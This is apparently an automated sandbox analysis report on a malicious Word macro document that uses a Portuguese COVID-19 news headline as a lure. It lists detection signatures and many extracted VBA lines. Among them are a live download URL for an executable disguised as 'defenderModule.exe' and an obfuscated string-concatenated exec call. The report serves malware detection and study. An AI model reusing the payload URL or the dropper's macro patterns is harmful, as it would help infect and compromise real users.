Loading ...

Play interactive tourEdit tour

Analysis Report Medica negra morre covid-19 apos racismo.docm

Overview

General Information

Sample Name:Medica negra morre covid-19 apos racismo.docm
Analysis ID:334232
MD5:549943fa268b65fee546e7adda0f06ba
SHA1:0ffc18af6916d88bf456f32a2e85b85e56b6c109
SHA256:c221dc10d175c2f3fb8366ad3aada1cf06c74ad8483a4a67bf62a0702b41c6f5
Tags:COVID-19docmgeoOutlookPRT

Most interesting Screenshot:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Document contains an embedded VBA with many string operations indicating source code obfuscation
Machine Learning detection for sample
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2280 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Machine Learning detection for sampleShow sources
Source: Medica negra morre covid-19 apos racismo.docmJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCB4583-025D-4403-9DBE-B492A11253DC}.tmpJump to behavior
Source: vbaProject.binString found in binary or memory: https://bitbucket.org/seveca-emilia/onemoreslave/downloads/defenderModule.exe

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, False
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, False
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, False
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, FalseSet objAdminIS = CreateObject("Microsoft.ISAdm")
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, FalseSet objAdminIS = CreateObject("Microsoft.ISAdm")
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, FalseSet objAdminIS = CreateObject("Microsoft.ISAdm")
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, False
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, FalseSet objAdminIS = CreateObject("Microsoft.ISAdm")
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, FalseSet objAdminIS = CreateObject("Microsoft.ISAdm")
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, False
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, False
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, FalseSet objAdminIS = CreateObject("Microsoft.ISAdm")
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, FalseSet objAdminIS = CreateObject("Microsoft.ISAdm")
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, FalseSet objAdminIS = CreateObject("Microsoft.ISAdm")
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, False
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, False
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, FalseSet objAdminIS = CreateObject("Microsoft.ISAdm")
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, FalseSet objAdminIS = CreateObject("Microsoft.ISAdm")
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, FalseSet objAdminIS = CreateObject("Microsoft.ISAdm")
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, False
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: ws2asd.exec (str1 + str2 + str3 + str)
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo n
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: folder = Left(Wscript.ScriptFullName, InStrRev(Wscript.ScriptFullName, "\"))
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Set Shell = CreateObject("Wscript.Shell")
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
